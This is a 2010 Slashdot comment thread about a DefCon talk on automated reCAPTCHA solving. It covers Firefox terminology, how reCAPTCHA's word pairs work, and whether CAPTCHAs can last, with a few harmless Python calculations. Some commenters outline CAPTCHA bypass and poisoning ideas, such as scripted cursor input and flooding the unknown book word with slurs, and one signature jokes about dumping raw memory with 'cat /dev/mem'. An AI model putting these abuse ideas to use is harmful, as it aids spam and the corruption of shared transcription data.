ReCAPTCHA.net Now Vulnerable to Algorithmic Attack

Offtopic by bcmm · 2010-08-05 09:00 · Score: -1, Offtopic

Obvious technical errors in summaries bother me more than spelling/grammar errors.

A Firefox extension is not the same thing as a plugin.

--
# cat /dev/mem | strings | grep -i llama
Damn, my RAM is full of llamas.

Re:Offtopic by stephanruby · 2010-08-05 09:20 · Score: 0, Redundant

> A Firefox extension is not the same thing as a plugin.
Firefox plugins ***used*** to be called Firefox extensions. You must just be too young to know this.
Re:Offtopic by Anonymous Coward · 2010-08-05 09:29 · Score: 4, Informative

No, Firefox addons used to be called extensions, plugins are still plugins.
Re:Offtopic by vlueboy · 2010-08-05 09:52 · Score: 1

From TFS:

> There's probably an excellent Firefox plugin to render this page's color scheme more bearable.
Halfway through this sentence I realized someone will now implement a nice little extension such that I never again have to answer these recaptchas. Pretty sure they would break this extension shortly with cunning, though. Anyway, at 30% accuracy now, it's easier to <F5> or click refresh 3 or 4 times than to get my hands off the mouse to type 2 word captchas that sometimes are eye-straining.
You don't have to reply here if you don't want to lose karma with such guilty-pleasure extension, brave spammers^Wcoders! :) I'll be googling the currently "virgin" string "captcha this fox" to find your work posted wherever.
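As a rough check on the "3 or 4 times" figure, here is a small sketch. It assumes each attempt succeeds independently with probability 0.30 (the accuracy quoted above); the independence is my assumption, not something TFA states.

```python
def expected_attempts(p_success: float) -> float:
    """Mean number of independent tries until the first success
    (the mean of a geometric distribution)."""
    if not 0.0 < p_success <= 1.0:
        raise ValueError("p_success must be in (0, 1]")
    return 1.0 / p_success


print(round(expected_attempts(0.30), 2))  # 3.33
```

So on average a 30% solver would need a bit over three refreshes, which fits the estimate.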
Re:Offtopic by Cougar Town · 2010-08-05 09:59 · Score: 3, Informative

Wrong. Plugins have been around since Netscape and are still called plugins. They have a different function than an extension (and an extension is what we would want in this case to fix the site's colours).
Both plugins and extensions, along with themes, are collectively referred to as "addons." "Plugin" is the wrong word in the summary. "Extension" or "addon" would have been acceptable.
Re:Offtopic by CarpetShark · 2010-08-05 10:36 · Score: 1, Funny

> A Firefox extension is not the same thing as a plugin.
> Firefox plugins ***used*** to be called Firefox extensions. You must just be too young to know this.
It's a bit like watching scary women fight over who was married to some guy first on Ricki Lake.
Re:Offtopic by easyTree · 2010-08-05 11:27 · Score: 1

Wrong. Plugins have been around since Netscape and are still called plugins. They have a different function than an extension (and divine intervention is what we would want in this case to fix the site's colours).

--
Requiem for the American Dream
Re:Offtopic by MobileTatsu-NJG · 2010-08-05 11:52 · Score: 1

> A Firefox extension is not the same thing as a plugin.
B.F.D.

--

"I like to lick butts!" by MobileTatsu-NJG (#32700246) (Score:5, Informative)
Re:Offtopic by Peach Rings · 2010-08-05 12:42 · Score: 1

reCAPTCHA isn't bad, but Google's captchas are so hard they're probably more easily solved by learning algorithms than actual human beings.
Re:Offtopic by delinear · 2010-08-05 23:45 · Score: 1

The problem is that they're serving up words a computer has already failed to recognise as part of their OCR project, so those same words are often impossible for humans to identify too (maybe they're smudged in the original source, for instance). This does result in some incredibly difficult words to read. According to the PowerPoint, you only have to get one word right. I tried this: sometimes it worked, other times it gave me an incorrect result. I think the truth is probably more like this (and I'm sure I once read that this is how it works): they serve one recognised word and one unrecognised word, and the only requirement for success is getting the recognised word right; they just compile the answers for the unrecognised word to advance their OCR projects. Usually the recognised word is more readable (we know it at least started out readable, whereas we can't make the same assumption for the unrecognised word), so in the majority of cases, as long as you type the word you can read and make a best guess at the other, you will still solve the captcha. Of course, it might still be easier to hit refresh a few times until you get a more readable pair.
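To make the one-known-word, one-unknown-word idea concrete, here is a toy model in Python. It is only a sketch of the scheme as described in this comment; the class name, the exact-match rule and the vote counter are all hypothetical and not reCAPTCHA's actual implementation.

```python
from collections import Counter


class TwoWordCaptcha:
    """Hypothetical model: one control word with a known answer,
    plus one unknown word whose guesses are merely collected."""

    def __init__(self, control_answer: str):
        self.control_answer = control_answer.lower()
        self.unknown_votes = Counter()  # guesses gathered for the unknown word

    def submit(self, control_guess: str, unknown_guess: str) -> bool:
        # Pass or fail depends only on the control word.
        passed = control_guess.strip().lower() == self.control_answer
        if passed:
            # Guesses are only counted from users who got the control word right.
            self.unknown_votes[unknown_guess.strip().lower()] += 1
        return passed


captcha = TwoWordCaptcha("morning")
print(captcha.submit("morning", "overlooks"))   # True
print(captcha.submit("morning", "whatever"))    # True: the unknown word is not checked
print(captcha.submit("mourning", "overlooks"))  # False: control word is wrong
```

In this model a wrong guess at the unknown word never fails the test, which matches the "type the one you can read and guess the other" experience.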
Re:Offtopic by Peach Rings · 2010-08-06 03:00 · Score: 1

Yes that's how it works, and everyone already knows that. I'm not even talking about recaptcha though, I'm talking about the impossible captchas you get when failing too many times to log into a Google account.

My eye's... by Anonymous Coward · 2010-08-05 09:02 · Score: 0

... They bleed nope wait just a shitty color scheme

Re:My eye's... by Anonymous Coward · 2010-08-05 10:12 · Score: 0

Looks fine to me here in the basement..
Re:My eye's... by Peach Rings · 2010-08-05 12:52 · Score: 4, Funny

You know a hacker is hard core when his site is monochrome in a monospace font, and he saves his files as straight up docx.
Re:My eye's... by Peach Rings · 2010-08-05 13:08 · Score: 2, Insightful

By the way, that wasn't just a facetious comment. TFA isn't a serious paper. It's not even typeset, just typed into Microsoft Word. And god knows why I'm being warned about VBScript macros when I try to open it.
And this isn't a case where the little guy is making real scientific progress right under the nose of the obsolete establishment. The author doesn't even have a freshman understanding of big-O notation, it's completely juvenile.
Re:My eye's... by hairyfeet · 2010-08-05 13:41 · Score: 5, Funny

You young ones and your complaining. "Ohhh the colors suck" SO WHAT! You don't remember when the Internet was invaded by those dual demons from hell, Geocities and Comet Cursors! Now THAT was torture buddy! YOU try dealing with a page that looks like it was designed by Unicorns on a crack binge, while having a fricking pocketwatch suddenly appear and hang from your cursor like a ball of snot on a string, all while having your shotgunned modems drug down to 300 baud land thanks to a bazillion puke inspiring GIFs spinning all out of time!
Now THAT is real suffering kid! /wanders off muttering/

--
ACs don't waste your time replying, your posts are never seen by me.
Re:My eye's... by Anonymous Coward · 2010-08-05 14:44 · Score: 0

Even more:

> I think it looks slick under firefox/linux with the right fonts.
Really great forethought in the web design process right there. Not to mention: Linux, and files in docx and pptx format? Eh?
Not to mention:

> I changed the color scheme because you guys apparently can't read black on red for some reason.
What a dick.
Re:My eye's... by Anonymous Coward · 2010-08-05 15:24 · Score: 0

it's presentation materials from defcon, windows generally plays nicer with foreign projectors in a pinch
Re:My eye's... by nicknamesarefunny · 2010-08-05 18:12 · Score: 0

Now that's gone as well. Looks like a very 'live' site....
Re:My eye's... by yuhong · 2010-08-05 18:20 · Score: 1

I downloaded it now and there are no macros, not to mention this is a .docx not a .docm.
Re:My eye's... by Anonymous Coward · 2010-08-05 18:21 · Score: 0

Oh you mean Rainbow Dividers. I get all of my design ideas from them. My sites pop like your eyeballs will if you click the link!
Re:My eye's... by Lavene · 2010-08-05 18:41 · Score: 1

I had such a site on Geocities. Flashing gifs, blink tags, a horrible MIDI playing in the background with no way of turning it of. Blue text on pink background and, naturally, CometCursor.
And of course no meaningful content what so ever.

Innocent times...
Re:My eye's... by Alien1024 · 2010-08-06 03:02 · Score: 1

Not only that, look at the email address - 0xn3on@gmail.com.
D4t b t3h stuff h4x0rz 1z m4d3 0f.
Re:My eye's... by tirnacopu · 2010-08-07 03:09 · Score: 1

Judging by the way you spell "off" or "whatsoever", the grammar mistakes (perhaps "I used to have"?) and how you place your commas, you are still as innocent as they come.

OpenOffice? by Anonymous Coward · 2010-08-05 09:02 · Score: 0

Does the PowerPoint open fine in Keynote?

colours by orange47 · 2010-08-05 09:03 · Score: 2, Funny

"There's probably an excellent Firefox plugin to render this page's color scheme more bearable."
just select all page, its better.

Re:colours by electrostatic · 2010-08-05 09:17 · Score: 4, Informative

"...an excellent Firefox plugin to render this page's color scheme more bearable."

Yep. Color Toggle

https://addons.mozilla.org/en-US/firefox/addon/9408/

I have it set so Ctl-Shift-Z set light yellow background, black text, and blue links.
Re:colours by commodoresloat · 2010-08-05 09:46 · Score: 1

sweet! Perfect for reading slashdot discussions in this IT color scheme! It's hilarious that a slashdot summary in this section is complaining about color schemes on other pages... glass houses and all
Re:colours by Anonymous Coward · 2010-08-05 09:47 · Score: 0

> I have it set so Ctl-Shift-Z set light yellow background, black text, and blue links.
I think the intent is to make pages more readable, I don't know what the hell you're doing.
Re:colours by Anonymous Coward · 2010-08-05 09:53 · Score: 1, Informative

Neat, I also use yellow background, black text and bluish links. It is very relaxing.
The color codes are #FFFF00 for the background, #000000 for the text and #00EFFF for the links.
Re:colours by Anonymous Coward · 2010-08-05 09:59 · Score: 1, Informative

View>page style>no style
easy.
Re:colours by SkyDude · 2010-08-05 10:32 · Score: 1

Just hit Ctrl-a and all the text shows up just fine.

--
== First cross river, then insult alligator.
Re:colours by Anonymous Coward · 2010-08-05 11:08 · Score: 0

Do you never Redo?
Re:colours by Anonymous Coward · 2010-08-05 12:37 · Score: 0

Maybe it's just me being paranoid, but when an AC posts agreeing with a crazy position I always suspect it's the original poster.
Re:colours by rnturn · 2010-08-05 16:35 · Score: 1

"just select all page, its better."
Ugh. That looks even worse on my browser. I found that "View->Page Style->No Style" worked much better. At least the text was easier to read. And no time was spent searching for an obscure plug-in.

--
CUR ALLOC 20195.....5804M
Re:colours by delinear · 2010-08-05 23:55 · Score: 1

People with one of the most common forms of dyslexia find it easier to read black on yellow (usually soft/light/pastel yellow) - it's high contrast but doesn't have the glare of pure white - just because that colour scheme doesn't sound more readable to you, that doesn't mean it's not more readable to someone.
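For anyone who wants a number for "high contrast", here is a sketch that computes the WCAG contrast ratio between two hex colours. Using the WCAG formula is my choice of measure, not something claimed in this thread, and #FFFF00 is simply the yellow quoted earlier in the discussion.

```python
def _linear(channel: int) -> float:
    """Convert one 8-bit sRGB channel to linear light (WCAG 2.x definition)."""
    c = channel / 255.0
    return c / 12.92 if c <= 0.03928 else ((c + 0.055) / 1.055) ** 2.4


def relative_luminance(hex_color: str) -> float:
    """Relative luminance of a colour given as '#RRGGBB'."""
    h = hex_color.lstrip("#")
    r, g, b = (int(h[i:i + 2], 16) for i in (0, 2, 4))
    return 0.2126 * _linear(r) + 0.7152 * _linear(g) + 0.0722 * _linear(b)


def contrast_ratio(fg: str, bg: str) -> float:
    """Contrast ratio between two colours, from 1 (identical) to 21 (black/white)."""
    lighter, darker = sorted(
        (relative_luminance(fg), relative_luminance(bg)), reverse=True
    )
    return (lighter + 0.05) / (darker + 0.05)


print(round(contrast_ratio("#000000", "#FFFFFF"), 1))
print(round(contrast_ratio("#000000", "#FFFF00"), 1))
```

Black on pure yellow comes out only slightly below black on white, so by this measure very little contrast is given up.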
Re:colours by jonadab · 2010-08-06 02:03 · Score: 1

I haven't browsed with page-specified colors turned on ever since I realized, back in the nineties, that most web content creators have extremely terrible taste in colors. Web pages appear in the system colors (#FFE6BC on #294D4A), same as everything else. That way I can actually stand to look at them.

--
Cut that out, or I will ship you to Norilsk in a box.
Re:colours by commodore64_love · 2010-08-06 03:49 · Score: 1

(1) If white is too glaring, just turn down the brightness on your monitor.
(2) The Black-on-red style reminds me of the 4-color IBM PCs and Apple IIs, circa 1988. Yeah. Nostalgic?!?!?
(3) I cursed the fact I had to downgrade from the beautiful 4000-color Commodore Amiga to a lowly PC or Apple, but that's what the school used, so I was stuck with it. I can't believe those ugly Apples and PCs "won" the computer war. Where did it all go wrong?

--
"I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
Re:colours by Anonymous Coward · 2010-08-06 10:45 · Score: 0

> I can't believe those ugly Apples and PCs "won" the computer war. Where did it all go wrong?
When Commodore sat on their laurels for years, let the PC catch up and then surpass it in both capability and price and responded with too little, too late.

Human Success? by Anonymous Coward · 2010-08-05 09:03 · Score: 5, Insightful

So what is the average human success rate? I think mine is only about 50%

Re:Human Success? by Anonymous Coward · 2010-08-05 09:24 · Score: 0

Sometimes I find myself just entering letters and pressing enter to get to the next one.
Re:Human Success? by Anonymous Coward · 2010-08-05 09:52 · Score: 2, Informative

Mine is 100%. Recaptcha is probably one of the easiest captcha I've ever had to deal with; something is wrong with you, sorry.
Re:Human Success? by wickedskaman · 2010-08-05 10:08 · Score: 1

Maybe that's why it's been figured out at ~30% efficacy. *shrug*

--
Sand's overrated... it's just tiny little rocks.
Re:Human Success? by Anonymous Coward · 2010-08-05 10:37 · Score: 0

With reCAPTCHA, you only have to have one of the words right. You can make the other word up. It's usually the least readable one.
Re:Human Success? by artg · 2010-08-05 11:22 · Score: 1

So, is there a firefox plugin that fills in captchas for me ?
Re:Human Success? by Kalriath · 2010-08-05 15:41 · Score: 3, Insightful

Yeah, I agree with this. Recaptcha is one of the easiest out there.
Admittedly though, I have around about 3% success rate with vBulletin captchas. Hear that forum owners? I'm not joining your forum because I can't read your captcha!

--
For a site about things like basic rights, Slashdot users sure do like to censor "dissent".
Re:Human Success? by delinear · 2010-08-06 00:05 · Score: 1

Recaptcha allows you to make more mistakes as standard than most other captcha solutions, I think (and TFA's findings seem to support this: it suggests you can get one word wrong plus one letter of the other word. When I tested that it was too much, but I have successfully passed the captcha with one right and one wrong word). Really you're being served one captcha word and one word Google's book scanning project couldn't recognise. You're solving the captcha word; with the other word (usually the harder one to read) you're only adding to the statistical weighting of what the word probably is. In other words, you can afford to be a little wrong and still get the captcha right.

My eyes! by Yvan256 · 2010-08-05 09:04 · Score: 2, Funny

The goggles, they do nothing!

Re:My eyes! by sexconker · 2010-08-05 09:36 · Score: 0, Troll

Did you not learn when I explained this yesterday?
The quote is: "My eyes! The goggles do nothing!".
There is no "they", nor is there any bad pronunciation. Indeed, it is correctly articulated and enunciated, with an accent.
Re:My eyes! by SomeJoel · 2010-08-05 09:40 · Score: 4, Funny

> Did you not learn when I explained this yesterday? The quote is: "My eyes! The goggles do nothing!". There is no "they", nor is there any bad pronunciation. Indeed, it is correctly articulated and enunciated, with an accent.
Easy there champ, nobody appreciates a Family Guy nerd correcting everyone's quotes.

--
<Complete your profile by adding a signature!>
Re:My eyes! by Agent0013 · 2010-08-05 10:00 · Score: 1

Unless it's actually a quote from the "Is it a good idea to microwave this" guys on Youtube. (Although I think they actually say the line about the mask and not the goggles.) http://www.youtube.com/watch?v=ewGkH-E_HWA

--

-- ssoorrrryy,, dduupplleexx sswwiittcchh oonn.. -Quote found on actual fortune cookie.
Re:My eyes! by Anonymous Coward · 2010-08-05 10:29 · Score: 0

Except it's from The Simpsons.
http://www.youtube.com/watch?v=OqfOxm_1BE0
Re:My eyes! by sexconker · 2010-08-05 11:05 · Score: 1

Except those guys are simply bastardizing the Simpsons quote.
Re:My eyes! by Anonymous Coward · 2010-08-05 11:23 · Score: -1, Redundant

What about getting the series correct? It was The Simpsons.
Re:My eyes! by billstewart · 2010-08-05 11:39 · Score: 1

Dude, if you're getting old enough to need reading glasses, just get them....
There are some really bad CAPTCHAs out there - reCAPTCHA is one of the more human-readable ones, but sometimes just magnification isn't enough.

--

Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
Re:My eyes! by SomeJoel · 2010-08-05 11:53 · Score: 4, Funny

Judging from the other replies, meta-humor is a little hard for you guys...

It works wonders though. For instance, the next time someone is talking about "the force" or jedis and such, tell them "Get a life, Star Trek sucks!". You'll find the reaction much more interesting than if you correctly identify the franchise.

--
<Complete your profile by adding a signature!>
Re:My eyes! by Anonymous Coward · 2010-08-05 13:10 · Score: 0

My eyes! These goggles don't seem to be working correctly!
Re:My eyes! by Anonymous Coward · 2010-08-06 02:05 · Score: 0

Dumbass, "the force" and "jedis" aren't from Star Trek, they're from the old Space 1999 tv series.
Re:My eyes! by Yvan256 · 2010-08-06 06:05 · Score: 1

Did you take the time to check the website linked in the summary? The goggles reference was to that website, not CAPTCHAs.
Re:My eyes! by billstewart · 2010-08-06 12:52 · Score: 1

Yes, it was pretty ugly, but easy to find the link and look at the article..

--

Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks

OCR improvements? by Anonymous Coward · 2010-08-05 09:05 · Score: 3, Interesting

Can these attack algorithms actually increase the accuracy of normal OCR programs?

Re:OCR improvements? by Chad Birch · 2010-08-05 09:22 · Score: 1

I haven't RTFA, but that's unlikely. With a captcha, you receive a response indicating whether you were correct or not. When using OCR, there isn't really any automated way to be sure if you've gotten it right.

--
Sturgeon was an optimist.
Re:OCR improvements? by nizo · 2010-08-05 09:24 · Score: 1

Better living through spam!

--
I Am My Own Worst Enemy
Re:OCR improvements? by ottothecow · 2010-08-05 09:33 · Score: 1

recaptcha was created to increase the accuracy of normal OCR programs...
so technically the bots solving them would also be helping proof Project Gutenberg texts so long as they are getting both the test word and the book word correct.

--
Bottles.
Re:OCR improvements? by AusIV · 2010-08-05 10:28 · Score: 2, Informative

They're not. I saw the presentation these guys gave at DefCon (their presentation was about as painful as their website), and they're only getting the test word correct with about 30% accuracy. They're not completely sure about their success rates on book words, but they believe it to be considerably lower than the test words.
Re:OCR improvements? by Garble Snarky · 2010-08-05 10:32 · Score: 1

Unless of course, all the bots use the exact same algorithm, and they all make the same mistake on the book words. Recaptcha uses consensus, right?
Re:OCR improvements? by Peach Rings · 2010-08-05 12:56 · Score: 1

IIRC, as part of the marblecake time magazine vote thing, people submitted thousands of PENISes as the book word to try to get it inserted randomly into ebooks. The recaptcha people said they've anticipated such an attack and that it's not possible to influence final book word results.
Re:OCR improvements? by Anonymous Coward · 2010-08-05 14:25 · Score: 0

What was so painful about it?
Re:OCR improvements? by n3ond4x · 2010-08-05 14:31 · Score: 2, Funny

They are not considerably lower because as book words are solved they become verification words. Also, if you didn't enjoy my talk, don't come next time.
Re:OCR improvements? by Sparr0 · 2010-08-05 19:44 · Score: 3, Insightful

The problem is that since you are *probably* solving the verification words with higher accuracy to begin with, you are actually poisoning the data being gathered regarding the book words. So, while a book word becoming a verification word based on your "solutions" will keep your solution rate constant, it actually damages the system when it comes time for humans to solve the CAPTCHA, or worse when the solutions are used as OCR corrections.
To clarify, given a classically OCR-able "foo" and a non-OCR-able-but-human-readable "bar", a human is expected to recognize the slightly-deformed-by-reCAPTCHA "foo" and is trusted to get "bar" right more often than OCR would. This attack only defeats the deformation applied by reCAPTCHA; it doesn't actually improve the OCR on the non-deformed words, which means you are going to submit an answer of "foo ban" every time this pair is encountered (or "blah ban" for a different scenario), and the reCAPTCHA system is eventually going to decide that the book word really is "ban".
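A toy illustration of that poisoning effect, assuming the book word is settled by a simple majority vote. The real weighting is not public as far as I know (and the reCAPTCHA people reportedly say they guard against this), so the `consensus` function and its `min_votes` threshold are purely hypothetical.

```python
from collections import Counter


def consensus(votes, min_votes=3):
    """Return the most common guess once enough votes exist, else None.
    A plain majority vote: an assumption, not reCAPTCHA's real rule."""
    if len(votes) < min_votes:
        return None
    word, _count = Counter(votes).most_common(1)[0]
    return word


human_votes = ["bar", "bar"]   # humans read the book word correctly
bot_votes = ["ban"] * 5        # same algorithm, same mistake every time

print(consensus(human_votes))              # None (not enough votes yet)
print(consensus(human_votes + bot_votes))  # ban
```

With identical bots outvoting the humans, the wrong reading wins under this naive rule.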
Re:OCR improvements? by AusIV · 2010-08-06 05:08 · Score: 1

Basically, they had written out a manual for breaking reCAPTCHA and copied it into PowerPoint slides. Then they stood in front of the audience and read straight from the slides, providing practically nothing we couldn't have gotten just from reading the slides.
On about the third slide, someone in the audience yells out "Are you guys seriously going to just stand up there and read your slides?" And one of the presenters confirmed that they were indeed going to stand up there and read their slides. Half the audience got up and left. If it weren't for my strong personal interest in breaking CAPTCHAs I would have been in the half that left.

Pretty cool stuff by Monkeedude1212 · 2010-08-05 09:07 · Score: 1

But that just means more spambots, right?

Re:Pretty cool stuff by Kepesk · 2010-08-05 09:09 · Score: 1

Personally, I don't think there will ever be an effective CAPTCHA or similar image-based technology. Someone will always come out with a better algorithm to beat them.

--
Help me fix my brother's injured butt!
Re:Pretty cool stuff by fyrewulff · 2010-08-05 09:14 · Score: 1

On the other hand, it'll be easier to block the known spammers because fewer of them will be able to afford the hardware/sweatshop/botnet setups once the computational brute force needed increases.

--
"We need to get over this notion, that, for Apple to win... Microsoft must lose." - Steve Jobs, 1997
Re:Pretty cool stuff by Anonymous Coward · 2010-08-05 09:23 · Score: 1, Insightful

This won't happen. Many current CAPTCHAs are already hard to solve for humans, and increasing the computational cost to solve a CAPTCHA will also make it harder to solve for humans.
Now, the problem is, computers are getting more powerful every day, while humans aren't. Sooner or later, this simple fact will render CAPTCHAs useless.
Re:Pretty cool stuff by Anonymous Coward · 2010-08-05 09:24 · Score: 0

If your brain can do it, a computer can be made to do it eventually. CAPTCHA will only block out all robots if it is illegible to human beings as well.
Re:Pretty cool stuff by veganboyjosh · 2010-08-05 09:29 · Score: 1

Useless to humans, maybe.

Maybe not so much to Skynet.
Re:Pretty cool stuff by John Hasler · 2010-08-05 10:41 · Score: 1

> Maybe not so much to Skynet.
Then we just have to hope the spammers piss off Skynet.

--
Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
Re:Pretty cool stuff by Peach Rings · 2010-08-05 12:57 · Score: 1

Obviously the evolution of CAPTCHA science will be toward text (or audio) that is more easily recognized by humans but not by bots. It's not just a matter of making captchas really really hard.
Re:Pretty cool stuff by KahabutDieDrake · 2010-08-05 15:40 · Score: 1

This assumes only text CAPTCHA. Iconic based CAPs exist, and are incredibly simple for humans to solve, and very difficult for computers to solve. 4 human face pictures. The question says "which one is smiling?" Now, I realize that even that can be computed, eventually. But the cost is MUCH higher for a computer than for a human. Further, that's the simplest possible example, and hardly encompasses all the possible variations or difficulties. Computers are really good at raw power. They SUCK at pattern recognition (although they are getting better quick) and they REALLY suck at emotional response. The concept of a CAPTCHA is sound, we just need to get away from text based systems. Because as OCR and raw power become more common and more powerful, they won't hold up.
Re:Pretty cool stuff by Anonymous Coward · 2010-08-05 18:05 · Score: 0

However, there are other problems with image-recognition-CAPTCHAs (by which I mean all the face-, dog-or-cat or similar CAPTCHAs). A good CAPTCHA system should have an abundance of different images or be able to generate them randomly. The latter is not possible for image-recognition CAPTCHAs. The former is very hard. Let's say you have 500.000 images of different faces. Now, the first thing to do for the development team of the CAPTCHA system is to process all the images manually to detect whether the person on the image is smiling or not. A single person can probably do that at a rate of 2 images / sec. This means he can process about 72.000 images / day (assuming he works 10h/day). He would roughly need a week to process all the images.
Now, the problem is, the attacker can do the same. As soon as he has identified all the images that are used in the CAPTCHA system, he can solve any CAPTCHA...
Furthermore, it's incredibly hard to get to 500.000 such images in the first place. Even if there was a central system like reCAPTCHA, maybe based on Facebook with millions of images, the problem would be if everyone uses the same CAPTCHA system, there would be an even greater appeal for attackers to break it - and, working together, already a hundred persons working for a month would easily be able to break the complete system.
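The arithmetic above can be checked with a few lines of Python. The figures (500.000 images, 2 images per second, 10 hours a day, a hundred people for a month) come straight from this comment; the function name and the 30-day month are just for illustration.

```python
import math


def labeling_days(images: int, images_per_second: float, hours_per_day: float) -> float:
    """Days one person needs to label `images` at the given pace."""
    per_day = images_per_second * 3600 * hours_per_day
    return images / per_day


days = labeling_days(500_000, 2, 10)
print(round(days, 2), math.ceil(days))  # 6.94 7

# Capacity of a 100-person team over 30 days at the same pace.
team_capacity = 100 * 30 * 2 * 3600 * 10
print(team_capacity)  # 216000000
```

So "roughly a week" holds for one person, and a hundred people in a month could in principle label a couple of hundred million images.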
Re:Pretty cool stuff by delinear · 2010-08-06 00:29 · Score: 1

Yes, centralised captcha would seem eventually destined to failure. The better approach would be that each instance be reasonably unique (even if it was only so far as each user uploading their own images), that way a determined spammer might break one site, but he can't use what he did there to attack others, each time he'll have to start from scratch. The obvious downside is the massive cost - instead of one person spending a week linking images in the database, you'd need one person per company. Still, for a reasonably large company for whom spam is a big issue it might eventually still become the best option (and to periodically add to and remove from the database of existing images).
Re:Pretty cool stuff by david_thornley · 2010-08-06 04:15 · Score: 1

One problem with that is that even the dumbest program has a 25% chance of correctly identifying which of four pictures has a smile, or a kitty, or Yog-Sothoth. If I, as a human, want to get into a website, a 25% success rate is very discouraging. For a robot that doesn't require one particular success, and can try several times, it's quite sufficient.
The critical part of a captcha is that the viewer has to enter the correct one of a very large number of choices. It's really hard to do that with pattern recognition.
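To put numbers on the "can try several times" point, here is a sketch that assumes a bot guesses uniformly at random and that attempts are independent (both are my simplifying assumptions).

```python
def p_at_least_one_success(p_single: float, attempts: int) -> float:
    """Chance of at least one success in `attempts` independent tries."""
    return 1.0 - (1.0 - p_single) ** attempts


# Four pictures, one correct: a blind guess succeeds 25% of the time.
print(round(p_at_least_one_success(0.25, 1), 3))   # 0.25
print(round(p_at_least_one_success(0.25, 10), 3))  # 0.944
```

Ten blind guesses already get a bot through about 94% of the time, which is why the answer space has to be very large.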

--
"When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes

Speaking about re-captcha by imsabbel · 2010-08-05 09:08 · Score: 3, Informative

I recently went to their homepage and looked _really_ hard for any statistics about which books are transcribed. I read their Science paper. Tried all sections.
It's all about the captcha part, and _nothing_ about the RE.
The way they state how it works ("We are using 100.000 unique words") sounds like they have given up on that part long ago and just recycle their old database again and again...

--
HI O WISE PRINCE. WHT TOOK U SO DAM LONG?

Re:Speaking about re-captcha by icebraining · 2010-08-05 09:14 · Score: 4, Informative

Currently, we are helping to digitize old editions of the New York Times and books from Google Books.
http://www.google.com/recaptcha/learnmore

--
Dilbert RSS feed
Re:Speaking about re-captcha by Mashiki · 2010-08-05 09:17 · Score: 1

Dunno. I've been seeing a lot of unique stuff recently like hebrew, chinese, japanese, and vertical lettering.

--
Om, nomnomnom...
Re:Speaking about re-captcha by MozeeToby · 2010-08-05 09:28 · Score: 1

You don't even need that, the attacker has access to everything, remember? They can just look at the file directly if it's predownloaded on the page or send the page the mouse over event for that element. I highly doubt that the people doing these algorithms are using a full web browser to pull and post data.
Re:Speaking about re-captcha by imsabbel · 2010-08-05 09:49 · Score: 4, Interesting

Hm.
So its for-profit work for the biggest advertising firm in the world.
Sort of expected project gutenberg or something.
Too bad.

--
HI O WISE PRINCE. WHT TOOK U SO DAM LONG?
Re:Speaking about re-captcha by Cyberax · 2010-08-05 11:32 · Score: 1

As far as I understand, this data will be publicly available on Google Books.
Re:Speaking about re-captcha by al0ha · 2010-08-05 12:02 · Score: 1

>> The way they state how it works ("We are using 100.000 unique words") sounds like they have given up on that part long ago and just recycle their old database again and again...

I think they recycle the database of words that are known, not the ones also proffered up that are unknown to the API, so the book building continues.

Entering the known word gets you past the gate, and once you've done that they assume that you also correctly answered the word they don't know. As far as I understand the unknown word is also offered up more than once to validate against multiple responses. The link below is an interesting outline of how some people figured out the known words were being recycled and exploited it.

http://www.theregister.co.uk/2010/03/01/ticket_scalping_hack/

--
Did you ever wake up in the morning, with a Zombie Woof behind your eyes? -- FZ
Re:Speaking about re-captcha by martin-boundary · 2010-08-05 12:08 · Score: 2, Insightful

Google books isn't really public, though. You can only view a small number of pages of each book, which is pretty useless from the point of view of public uses that come to mind.
Re:Speaking about re-captcha by Cyberax · 2010-08-05 12:12 · Score: 1

Google Books allows you to view and download entire books, if they are in the public domain.
Example:
http://books.google.com/books?id=Q_rLGDGlQz0C&printsec=frontcover&dq=Mark+Twain&hl=en&ei=HlNbTOrmKtWN4gb-q9j3AQ&sa=X&oi=book_result&ct=result&resnum=2&ved=0CCsQ6AEwAQ#v=thumbnail&q&f=false
Re:Speaking about re-captcha by Anonymous Coward · 2010-08-05 12:44 · Score: 0

The word which is being used to write the book is easily identifiable if you do enough reCaptchas. You can replace it with any word you want. Some people already have been, en masse. Google may find itself in a sea of racial slurs if enough people put the same incorrect word intentionally...
Re:Speaking about re-captcha by bill_mcgonigle · 2010-08-05 15:16 · Score: 2, Insightful

> So its for-profit work for the biggest advertising firm in the world.
> Sort of expected project gutenberg or something.
Google's digitizing hundreds of thousands of historic books from some of the great university libraries. What's the problem here, that they won't lose money on the effort?
The NYT archive has been done for at least a year, it made reCAPTCHA a feasible company.

--
My God, it's Full of Source!
OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
Re:Speaking about re-captcha by extra88 · 2010-08-05 23:29 · Score: 1

I think you're underestimating the public good from what Google provides but even so, the universities get their own copy of the data for their books so they can do even more with it, as copyright allows.
Re:Speaking about re-captcha by jonadab · 2010-08-06 02:11 · Score: 1

> You can only view a small number of pages of each book, which is
> pretty useless from the point of view of public uses that come to mind.

It's useful to the public for the purpose of search -- being able to *find* what you're looking for, even if it's not in the bibliographic data and only appears embedded in the text someplace. I wish the catalog computers at the public library could do that. It brings us one step closer to LCARS.

--
Cut that out, or I will ship you to Norilsk in a box.
Re:Speaking about re-captcha by Anonymous Coward · 2010-08-09 01:09 · Score: 0

Hm.
So it's for-profit work for the biggest advertising firm in the world.
Maybe because it's owned by the biggest advertising firm in the world?

Can the mouse cursor be positioned by a script? by master_p · 2010-08-05 09:11 · Score: 1

If not, then the captcha should only be visible when the mouse cursor is over it.

The key to a successful captcha is to make it accessible only by a user sitting in front of the screen.

Re:Can the mouse cursor be positioned by a script? by machxor · 2010-08-05 09:18 · Score: 1

It's fairly trivial to position the mouse with AutoIt, and AutoIt is scriptable.
Re:Can the mouse cursor be positioned by a script? by Lehk228 · 2010-08-05 09:28 · Score: 1

Even if it couldn't be done normally, a hostile client could say the cursor is over the captcha just as easily as it could place the cursor there.

--
Snowden and Manning are heroes.
Re:Can the mouse cursor be positioned by a script? by Anonymous Coward · 2010-08-05 09:43 · Score: 0

Let me rephrase what you said, and we'll see if you can spot the part where you're thinking like a bloody manager, writing random "security" requirements that are meaningless in practice....
"The key to a successful captcha is to trust the client to detect a user sitting in front of the screen"
Re:Can the mouse cursor be positioned by a script? by Anonymous Coward · 2010-08-05 09:49 · Score: 0

um, people breaking captchas don't actually use browsers. i guess you're just trolling though, nice work.
